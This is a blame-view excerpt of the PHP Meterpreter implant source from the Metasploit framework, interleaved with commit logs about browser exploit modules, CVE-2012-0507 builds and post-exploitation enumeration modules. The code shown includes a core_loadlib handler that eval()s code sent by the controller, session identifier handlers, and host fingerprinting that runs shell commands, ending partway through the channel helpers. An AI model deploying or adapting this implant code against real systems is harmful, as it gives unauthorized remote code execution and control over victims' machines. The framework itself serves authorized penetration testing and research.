Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
2012-05-16 01:00:02 +02:00
|
|
|
global $commands;
|
2011-06-30 12:28:04 +02:00
|
|
|
my_print("doing core_loadlib");
|
2010-06-15 01:20:57 +02:00
|
|
|
$data_tlv = packet_get_tlv($req, TLV_TYPE_DATA);
|
2010-07-14 00:51:15 +02:00
|
|
|
if (($data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED) {
|
|
|
|
return ERROR_FAILURE;
|
|
|
|
}
|
Squashed commit of the following:
commit 6a3ad1d887df9d277e4878de94f8700ed8e404f9
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 16:22:49 2012 -0600
Add register_command calls for md5 and sha1
commit dbd52c5a1edfe1818a580d4d46aac0a9ca038e9c
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 16:22:09 2012 -0600
Read the file instead of downloading it
commit 55b84ad8e2a8532b3f8520ccb1162169b8e9c056
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 15:27:11 2012 -0600
Re-compile linux meterp to support the loadlib api
commit d112e84e490aa30aa9533fb0bdb33a9713ce01a5
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:50:25 2012 -0600
Re-compile java meterp to support the loadlib api
commit c137187b346b708487245a849b95343223e4e7b0
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:44:10 2012 -0600
Don't try to get interfaces if this session doesn't implement it
commit 88bba1e6c360c5725c4174623f56bcb6d8b54228
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 14:38:17 2012 -0600
Remove debugging load
commit 02954cbf93e2a13da967780cb703103b3f83ecf4
Merge: d9ef256 88b35a3
Author: James Lee <egypt@metasploit.com>
Date: Wed May 9 12:06:53 2012 -0600
Merge branch 'rapid7' into feature/4905
Conflicts:
data/meterpreter/ext_server_stdapi.php
modules/exploits/windows/browser/adobe_flashplayer_flash10o.rb
commit d9ef2569b88ae8bce67f13316f6eff76311fd846
Author: James Lee <egypt@metasploit.com>
Date: Wed May 2 18:06:06 2012 -0600
PHP doesn't support rev2self
commit bf13ea0ff25541da07b8c099218e5ad7ea6ae8ba
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 18:21:59 2012 -0600
Add php support for returning new extension commands
commit 7e35f2d671d3797fc3fab12e54015387f44b0b33
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 16:03:26 2012 -0600
Reset CVE-2012-0507 back to master
Purges commits unrelated to this branch.
commit 86a77b3cd017e1e3a3f23d9fba3b9ed173761f80
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 15:59:35 2012 -0600
Revert "Make building the jar for cve-2012-0507 a bit easier"
This reverts commit 27ef76522ad10436ec785728445ed2cc0657f85f.
Conflicts:
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/src/msf/x/PayloadX.java
commit 8c259fb779f736be16fe972215ddff1dd32fd0f3
Merge: fe2c273 1c03c2b
Author: James Lee <egypt@metasploit.com>
Date: Tue May 1 15:35:44 2012 -0600
Merge branch 'rapid7' into feature/4905
Conflicts:
data/meterpreter/ext_server_stdapi.jar
data/meterpreter/meterpreter.jar
external/source/meterpreter/java/src/meterpreter/com/metasploit/meterpreter/Meterpreter.java
modules/auxiliary/server/browser_autopwn.rb
commit fe2c273a6d840c67040d6c9e337f908204337e18
Merge: 8caff47 4e955e5
Author: James Lee <egypt@metasploit.com>
Date: Fri Apr 6 10:19:53 2012 -0600
Merge branch 'rapid7' into feature/4905
commit 8caff47d97469f1a5459c04461fd1098487ea514
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 17:51:18 2012 -0600
Fix requires to find the test library
commit 51c33574cee3c47f0b2900c388d3d1213dd0a90d
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 17:48:35 2012 -0600
Fix a load order problem with solaris post mods
commit 81b658362e5e6bdd215d18b53d14429d163aff72
Merge: adad2cf 6ef4257
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 15:43:19 2012 -0600
Merge branch 'master' into feature/4905
commit 6ef42579471c6fde4bba71d0d4ce2c6c3e836180
Merge: 70ab8c0 5852455
Author: James Lee <egypt@metasploit.com>
Date: Thu Apr 5 15:16:56 2012 -0600
Merge branch 'rapid7'
Conflicts:
lib/rex/exploitation/javascriptosdetect.rb
commit adad2cf04c501c2a787e5475b62abd31871c06a0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 4f8a437b490e2b2774f9efd23b4891eaf007cf16
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 27ef76522ad10436ec785728445ed2cc0657f85f
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit db3dbad0a5ff20b05758be073c3502138ff095c2
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 776976af31795bdf1b405e208a2d4b78a6b6c2cf
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit a611ab16e06bd324d6616d0bd69f2c09d671bca0
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 5114d35de7c2f234ac7fe4288b344d4f2bb9731f
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 748309465a029593e2fe2fd445149745367513f4
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 954d485e3b8ffea9a7451bd495c1956a098e0eda
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
commit cba8d7c911fb184f6358948022fd4a0e010878d0
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 18:04:50 2012 -0600
Linux doesn't implement (drop|steal)_token
commit 1cfda3a7b045c08ecfae1ad688e0124e76bd0c8f
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 17:57:37 2012 -0600
Add availability checks for net, sys, ui, and webcam
commit 4bdf39a8bf4b5aab293fc47cb8282d0346db0811
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 23 16:45:59 2012 -0600
add requirement checking for fs and core commands
commit 42e35971c9f7348b57293b2b94a42dd0260ac7e4
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 21 17:20:59 2012 -0600
Add a to_octal method that converts e.g. "A" to \0101
commit c3b9415a0a9e2b55b1effbaf2396e11f88301aaa
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 21 17:20:07 2012 -0600
Don't use "echo -n"
It's not portable
commit b0f3ceccfaedbeaf67fbbe76f1a0a9aec7b44548
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 20 17:01:10 2012 -0600
Return a list of new commands after core_loadlib, java version
Thanks mihi for the patch and the awesome responsiveness!
commit d65303e1b6458bd4b95138dc0d61e5354c4e8d3a
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 20 13:21:06 2012 -0600
Make sure we have a response before doing stuff with it
commit 721001ead474a17d1a16de543f78b548879f5e7e
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 21:25:31 2012 -0600
Add missing rmdir and mkdir protocol commands to PHP
Now passes all the stdapi tests that it can
[*] Session type is meterpreter and platform is php/php
[+] should return a user id
[+] should return a sysinfo Hash
[-] FAILED: should return network interfaces
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
[-] FAILED: should have an interface that matches session_host
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_interfaces: Operation failed: 1
[-] FAILED: should return network routes
[-] Exception: Rex::Post::Meterpreter::RequestError : stdapi_net_config_get_routes: Operation failed: 1
[+] should return the proper directory separator
[+] should return the current working directory
[+] should list files in the current directory
[+] should stat a directory
[+] should create and remove a dir
[+] should change directories
[+] should create and remove files
[+] should upload a file
[-] Passed: 10; Failed: 3
commit 024e99167a025f4678a707e1ee809a1524007d4d
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:26:00 2012 -0600
Use a proper TLV type instead of a generic one
commit 1836d915cbe0bfd2f536a667e74d8d6a6ccee72a
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:24:25 2012 -0600
Fix a counting error that caused segfaults (Linux)
commit 1e419d3fc392e435ae0af703561ce10bd5a45eb0
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 15:06:02 2012 -0600
Return a list of new commands after core_loadlib
Gets Windows back in sync with Linux
commit 3d3959f720de68e2f36ebfabe8196e01f98fe904
Author: James Lee <egypt@metasploit.com>
Date: Mon Mar 19 14:50:55 2012 -0600
Refactor extensionList -> extension_commands
It's not the same as extension_list.
commit a7acb638af803732fc5f3975e0c0632f427e0deb
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sun Mar 18 00:07:27 2012 -0500
Massive whitespace cleanup
commit ef8b9fd5cea7db43860a5b88d7397ba84393ecd5
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 16:00:20 2012 -0500
Add back enum_protections with some new changes
commit d778eec36953bb9bf4985e967ad2c119a1acd79b
Author: ohdae <bindshell@live.com>
Date: Sat Mar 17 13:28:31 2012 -0400
Added fix for enum_protections
commit 64611819d43bf13ab2d68f4353513c39e5a64fe0
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 03:14:26 2012 -0500
A bunch of fixes
commit bb1a0205d73e75a61a8fbf5ff6440dd09f9780f9
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:28:05 2012 -0500
The comments in get_chatlogs need an update
commit 666477e42a734f3120dcc4282b01b5ab5819384a
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:25:41 2012 -0500
Correct license format
commit 3c8eecbcd7b952abaca0b1ce14dca41e1d4cabb7
Author: sinn3r <msfsinn3r@gmail.com>
Date: Sat Mar 17 00:22:03 2012 -0500
Add enum_adium.rb post module
commit d290cf4fef1309df9a1af748e7c6c259a6788576
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 16:54:36 2012 -0300
Changed store_note to store_loot. Fixed local/remote file retrieval
commit ccb830b594ea0f0a8ce7c29b24f2f137ecfd5c4c
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 11:29:07 2012 -0600
Fall back to MIB method if we can't get netmasks
Misses IPv6 addresses, but at least doesn't break everything.
[Fixes #6525]
commit a9a30232dd5fcc0854c10b4d58df8511a23f3091
Author: sinn3r <msfsinn3r@gmail.com>
Date: Fri Mar 16 11:49:31 2012 -0500
This module is not ready, yanked.
commit 6bb34f7fd0785d31902f1edc938a6b05b91a1495
Author: Gregory Man <man.gregory@gmail.com>
Date: Fri Mar 16 18:09:08 2012 +0200
sockso_traversal 1.8 compatibility fix
commit e76965ce565a8ae634dc0d3c743542f1a6d977d7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:17:35 2012 -0400
fix
commit 61ce7b587de54363f7071bc19df5a29eb29e9aa7
Author: ohdae <bindshell@live.com>
Date: Fri Mar 16 09:14:48 2012 -0400
saves each config to loot instead of notes
commit f4713974fa82d8b13017cb0817b5fd36696194d9
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 03:46:10 2012 -0600
Check for a 0 prefix length
If the OnLinkPrefixLength is 0, something is wrong, try the value in the
prefix linked list. Appears to fix v4 addresses on XP but not 2k3.
[See #6525]
commit cde7fcc012e04880f2faa28226a1fc5834a2e3d5
Author: James Lee <egypt@metasploit.com>
Date: Fri Mar 16 01:46:41 2012 -0600
Return network prefixes when available
Solves #6525 on Vista+. Win2k still works using the old MIB method
(which doesn't support ipv6). Win2k3 and XP are still busted for
unknown reasons.
commit 98bd9a7bd09149f524ebbe1501ec916bf99b078d
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 22:59:42 2012 -0400
Enumerate important and interesting configuration files
commit 9336df2ac28ee2df10a0e66e7006df3d23493492
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 19:06:48 2012 -0500
More Virtualisation SSL fixes
commit f24c378281ee6c85f687d4823f09ef5848812daf
Author: David Maloney <David_Maloney@rapid7.com>
Date: Thu Mar 15 18:15:29 2012 -0500
Default SSL to true for esx_fingerprint module
commit d6e14c42120df0fd16b79709ac5723d0e2818810
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:56:24 2012 -0500
Fix typo
commit b24dcfe43e625740ec8a1465f33be02f7ec40162
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 15:55:54 2012 -0500
Add sockso dir traversal
commit 033052c1e075fcf43e9c17e5ee4a5006247cb375
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 15 14:31:25 2012 -0600
Fix syntax error in 1.8, thanks Jun Koi for the patch
commit 4529efaeaa22e52c9c7c1528c68efb60af8af729
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:27:40 2012 -0500
enum_protections is now find_apps
commit 49e823802bd8f2cb1940545e74db04f3788352d1
Author: sinn3r <msfsinn3r@gmail.com>
Date: Thu Mar 15 14:22:23 2012 -0500
File rename, as well as design and cosmetic changes
commit ccf6b011145cf9db444f7e2d3fb3ec61738e88cb
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 15:29:52 2012 -0300
added report_note, removed store_loot function, cleaned up info/author
commit 27d571932e51afbac0c0fcd95c52f038786a9a28
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 12:18:29 2012 -0300
fixed output newline issue
commit 5a828e35d1629dc68825fe7d9322d1316888f8d7
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:05:35 2012 -0300
fixed save line
commit 805c2ee9871c076a8c0ac62b028a7942af70b6a5
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:02:07 2012 -0300
removed unneeded comments
commit 5861e1512f2949c0d7848d9ebed8241277462085
Author: ohdae <bindshell@live.com>
Date: Thu Mar 15 01:00:55 2012 -0300
fixed output issue
commit 593a3648111f1db1f56a410250539261c2a7cd9f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 18:26:53 2012 -0300
removed unneeded dependency
commit 05053e6e74b0ac99bbd4005c40ecc3b1196fd13f
Author: ohdae <bindshell@live.com>
Date: Wed Mar 14 13:30:16 2012 -0400
locates installed 3rd part av, fws, etc
commit 5bf512d0e9d2b412c4107228db178a7078111443
Author: sinn3r <msfsinn3r@gmail.com>
Date: Wed Mar 14 16:50:54 2012 -0500
Add OSVDB-79863 NetDecision Directory Traversal
commit 18715d0367f4ef01b5998d732043cbe224e1787e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 23:03:01 2012 -0600
Store the retrieved commands on the session
commit b752cb8b31fd8dcd221fb6caa483f6202bf5a4fd
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:45:16 2012 -0600
Retrieve the list of new commands
The client side doesn't do anything with them yet
commit 69ce8ef42d4089a0b26644bd4d6bebf57c4cfd50
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 22:41:16 2012 -0600
Return a list of the new commands in response to core_loadlib
Linux
commit 354c754aa4cce63ffebb4567f3bbfd621ffef46c
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 15:13:45 2012 -0600
Whitespace at EOL
commit 4afcb4cb9da1921ede29b03b149433cc65d680da
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 14 14:30:09 2012 -0600
Create instance methods that return extensions
Before this change, meterpreter sessions would not #respond_to? their
extensions despite having a pseudo-accessor for them:
```
>> client.respond_to? :sys
=> false
>> client.sys
=> #<Rex::Post::Meterpreter::ObjectAliases:0x0000000e263488 @aliases={"config"=>#<Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Config:0x0000000e268dc8 @client=#<Session:meterpreter 192.168.99.1:55882 (192.168.99.1) "uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000 @ wpad">>, "process"=>#<Class:0x0000000e268d20>, "registry"=>#<Class:0x0000000e266da0>, "eventlog"=>#<Class:0x0000000e2654e8>, "power"=>#<Class:0x0000000e263c30>}>
```
After:
```
>> client.respond_to? :sys
=> true
```
commit 70ab8c018f67d15929b6f41322540837ab7b37c5
Merge: a8a3938 5f2bace
Author: James Lee <egypt@metasploit.com>
Date: Tue Apr 3 11:46:25 2012 -0600
Merge branch 'master' into bap-refactor
Conflicts:
external/source/exploits/CVE-2012-0507/Help.java
external/source/exploits/CVE-2012-0507/Makefile
external/source/exploits/CVE-2012-0507/msf/x/Help.java
external/source/exploits/CVE-2012-0507/src/a/Exploit.java
external/source/exploits/CVE-2012-0507/src/a/Help.java
commit a8a393891588a8b5c18e3c2173f1cd9c2480b2d0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 20:20:21 2012 -0600
Deal with null data/jar
Not sure why "" turns into null sometimes, but it was breaking shells;
this fixes it.
commit 5e5eb39d3ccb62a9fc006be8241cfb97723caa06
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:10:59 2012 -0600
Prev commit moved these to src/a
commit 5074eadbea426fc4f83d6d165a01e640ef42b4de
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 18:08:32 2012 -0600
Make building the jar for cve-2012-0507 a bit easier
Mostly stolen from cve-2008-5353
commit bdb3fbe7fd19aa76b4069edca5a78c53fec668c0
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 14:52:23 2012 -0600
Fix incorrect option name
commit 78824ef60084510d3befe0ded6eed314d55eeb12
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:24:33 2012 -0600
Add the detected browser version to the DOM
Doing it this way lets modules grab the info a bit more easily.
commit 9813ccb8d6b14e0e728b8a13bacf59dd31b9c4b9
Merge: 0faa3f6 b5fc8e4
Author: James Lee <egypt@metasploit.com>
Date: Thu Mar 29 13:19:05 2012 -0600
Merge branch 'master' into bap-refactor
commit 0faa3f65240c3a2b3ab0e72f4aeb2e9f50ed54ee
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:36:20 2012 -0600
Add bap support to java_rhino
commit 66ca27f994e3b11c9c8adae85642820768158860
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:35:16 2012 -0600
Put next_exploit on the window object so it's always in scope
Solves some issues with Chrome not running more than one exploit
commit 7fc2ca1a0690c7a973307772aed42ab3514e1761
Merge: 325d306 e48c47e
Author: James Lee <egypt@metasploit.com>
Date: Wed Mar 28 15:10:54 2012 -0600
Merge branch 'master' into bap-refactor
commit 325d3060599bc79674e93dd5f55a4e60061e9bdb
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 14:31:53 2012 -0600
Pull common stuff up out of the body
commit 4f2b3260bf7f14f4d763625792adb0c3cfd1ed7c
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:04:03 2012 -0600
Fix indentation level
commit 9b905c53b4d46beb86da8168a1c2c5b2da340f6d
Author: James Lee <egypt@metasploit.com>
Date: Tue Mar 27 11:02:42 2012 -0600
Abstract out copy-pasted methods
Need to do the same thing for OSX, but it's a different implementation.
2012-05-16 01:00:02 +02:00
|
|
|
$tmp = $commands;
|
|
|
|
eval($data_tlv['value']);
|
|
|
|
$new = array_diff($commands, $tmp);
|
|
|
|
foreach ($new as $meth) {
|
|
|
|
packet_add_tlv($pkt, create_tlv(TLV_TYPE_METHOD, $meth));
|
|
|
|
}
|
|
|
|
|
|
|
|
return ERROR_SUCCESS;
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
}
|
|
|
|
|
|
|
|
|
2015-08-28 16:38:26 +02:00
|
|
|
function core_enumextcmd($req, &$pkt) {
|
|
|
|
my_print("doing core_enumextcmd");
|
|
|
|
|
|
|
|
global $commands;
|
|
|
|
|
|
|
|
$extension_name_tlv = packet_get_tlv($req, TLV_TYPE_STRING);;
|
|
|
|
$expected_ext_name = $extension_name_tlv['value'];
|
|
|
|
|
|
|
|
foreach ($commands as $ext_cmd) {
|
|
|
|
list($ext_name, $cmd) = explode("_", $ext_cmd, 2);
|
|
|
|
if ($ext_name == $expected_ext_name) {
|
|
|
|
packet_add_tlv($pkt, create_tlv(TLV_TYPE_STRING, $cmd));
|
|
|
|
}
|
|
|
|
}
|
|
|
|
return ERROR_SUCCESS;
|
|
|
|
}
|
|
|
|
|
2016-10-29 04:42:36 +02:00
|
|
|
function core_set_uuid($req, &$pkt) {
|
|
|
|
my_print("doing core_set_uuid");
|
|
|
|
$new_uuid = packet_get_tlv($req, TLV_TYPE_UUID);
|
|
|
|
if ($new_uuid != null) {
|
|
|
|
$GLOBALS['UUID'] = $new_uuid['value'];
|
|
|
|
my_print("New UUID is {$GLOBALS['UUID']}");
|
|
|
|
}
|
2015-05-15 04:27:25 +02:00
|
|
|
return ERROR_SUCCESS;
|
|
|
|
}
|
2010-06-03 06:45:48 +02:00
|
|
|
|
|
|
|
|
2015-05-18 09:40:48 +02:00
|
|
|
function get_hdd_label() {
|
|
|
|
foreach (scandir('/dev/disk/by-id/') as $file) {
|
|
|
|
foreach (array("ata-", "mb-") as $prefix) {
|
|
|
|
if (strpos($file, $prefix) === 0) {
|
|
|
|
return substr($file, strlen($prefix));
|
|
|
|
}
|
|
|
|
}
|
|
|
|
}
|
|
|
|
return "";
|
|
|
|
}
|
|
|
|
|
2017-06-05 13:15:27 +02:00
|
|
|
function core_get_session_guid($req, &$pkt) {
|
|
|
|
packet_add_tlv($pkt, create_tlv(TLV_TYPE_SESSION_GUID, $GLOBALS['SESSION_GUID']));
|
|
|
|
return ERROR_SUCCESS;
|
|
|
|
}
|
|
|
|
|
|
|
|
function core_set_session_guid($req, &$pkt) {
|
|
|
|
my_print("doing core_set_session_guid");
|
|
|
|
$new_guid = packet_get_tlv($req, TLV_TYPE_SESSION_GUID);
|
|
|
|
if ($new_guid != null) {
|
|
|
|
$GLOBALS['SESSION_ID'] = $new_guid['value'];
|
|
|
|
my_print("New Session GUID is {$GLOBALS['SESSION_GUID']}");
|
|
|
|
}
|
|
|
|
return ERROR_SUCCESS;
|
|
|
|
}
|
|
|
|
|
2015-05-18 09:40:48 +02:00
|
|
|
function core_machine_id($req, &$pkt) {
|
|
|
|
my_print("doing core_machine_id");
|
2015-09-09 16:14:34 +02:00
|
|
|
if (is_callable('gethostname')) {
|
|
|
|
# introduced in 5.3
|
|
|
|
$machine_id = gethostname();
|
|
|
|
} else {
|
|
|
|
$machine_id = php_uname('n');
|
|
|
|
}
|
2015-05-18 09:40:48 +02:00
|
|
|
$serial = "";
|
|
|
|
|
|
|
|
if (is_windows()) {
|
2015-05-22 06:41:12 +02:00
|
|
|
# It's dirty, but there's not really a nicer way of doing this on windows. Make sure
|
|
|
|
# it's lowercase as this is what the other meterpreters use.
|
|
|
|
$output = strtolower(shell_exec("vol %SYSTEMDRIVE%"));
|
|
|
|
$serial = preg_replace('/.*serial number is ([a-z0-9]{4}-[a-z0-9]{4}).*/s', '$1', $output);
|
2015-05-18 09:40:48 +02:00
|
|
|
} else {
|
|
|
|
$serial = get_hdd_label();
|
|
|
|
}
|
|
|
|
|
|
|
|
packet_add_tlv($pkt, create_tlv(TLV_TYPE_MACHINE_ID, $serial.":".$machine_id));
|
|
|
|
return ERROR_SUCCESS;
|
|
|
|
}
|
2010-06-03 06:45:48 +02:00
|
|
|
|
|
|
|
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
##
|
|
|
|
# Channel Helper Functions
|
|
|
|
##
|
|
|
|
$channels = array();
|
|
|
|
|
2010-07-14 00:51:15 +02:00
|
|
|
function register_channel($in, $out=null, $err=null) {
|
|
|
|
global $channels;
|
|
|
|
if ($out == null) { $out = $in; }
|
|
|
|
if ($err == null) { $err = $out; }
|
2011-06-30 12:28:04 +02:00
|
|
|
$channels[] = array(0 => $in, 1 => $out, 2 => $err, 'type' => get_rtype($in), 'data' => '');
|
2011-05-13 03:22:53 +02:00
|
|
|
|
|
|
|
# Grab the last index and use it as the new ID.
|
|
|
|
$id = end(array_keys($channels));
|
2010-07-14 00:51:15 +02:00
|
|
|
my_print("Created new channel $in, with id $id");
|
|
|
|
return $id;
|
|
|
|
}
|
|
|
|
|
2011-05-13 03:22:53 +02:00
|
|
|
#
|
|
|
|
# Channels look like this:
|
|
|
|
#
|
|
|
|
# Array
|
|
|
|
# (
|
|
|
|
# [0] => Array
|
|
|
|
# (
|
|
|
|
# [0] => Resource id #12
|
|
|
|
# [1] => Resource id #13
|
|
|
|
# [2] => Resource id #14
|
|
|
|
# [type] => 'stream'
|
2011-06-30 12:28:04 +02:00
|
|
|
# [data] => '...'
|
2011-05-13 03:22:53 +02:00
|
|
|
# )
|
|
|
|
# )
|
|
|
|
#
|
2010-06-13 18:44:22 +02:00
|
|
|
function get_channel_id_from_resource($resource) {
|
2010-06-04 04:43:17 +02:00
|
|
|
global $channels;
|
2011-05-13 03:22:53 +02:00
|
|
|
if (empty($channels)) {
|
|
|
|
return false;
|
|
|
|
}
|
|
|
|
foreach ($channels as $i => $chan_ary) {
|
|
|
|
if (in_array($resource, $chan_ary)) {
|
|
|
|
my_print("Found channel id $i");
|
2010-06-04 04:43:17 +02:00
|
|
|
return $i;
|
|
|
|
}
|
|
|
|
}
|
|
|
|
return false;
|
|
|
|
}
|
|
|
|
|
2016-01-05 04:27:17 +01:00
|
|
|
function &get_channel_by_id($chan_id) {
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
global $channels;
|
2011-05-13 03:22:53 +02:00
|
|
|
my_print("Looking up channel id $chan_id");
|
2011-06-30 12:28:04 +02:00
|
|
|
#dump_channels("in get_channel_by_id");
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
if (array_key_exists($chan_id, $channels)) {
|
2011-06-30 12:28:04 +02:00
|
|
|
my_print("Found one");
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
return $channels[$chan_id];
|
|
|
|
} else {
|
|
|
|
return false;
|
|
|
|
}
|
|
|
|
}
|
2011-06-30 12:28:04 +02:00
|
|
|
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
# Write data to the channel's stdin
|
|
|
|
function channel_write($chan_id, $data) {
|
|
|
|
$c = get_channel_by_id($chan_id);
|
|
|
|
if ($c && is_resource($c[0])) {
|
2011-06-30 12:28:04 +02:00
|
|
|
my_print("---Writing '$data' to channel $chan_id");
|
2010-06-13 18:44:22 +02:00
|
|
|
return write($c[0], $data);
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
2010-06-02 10:28:39 +02:00
|
|
|
} else {
|
|
|
|
return false;
|
|
|
|
}
|
|
|
|
}
|
2011-06-30 12:28:04 +02:00
|
|
|
|
initial commit of php meterpreter, see #391. upload, download, cd, pwd, ls, cat, sysinfo, getpid, and ps all work fine.
* execute works with channel read/write but no interact yet
* getuid is weird, since php's get_current_user() and getmyuid() return the owner of the file instead of the running uid (wtf?)
git-svn-id: file:///home/svn/framework3/trunk@9393 4d416f70-5f16-0410-b530-b9f4589650da
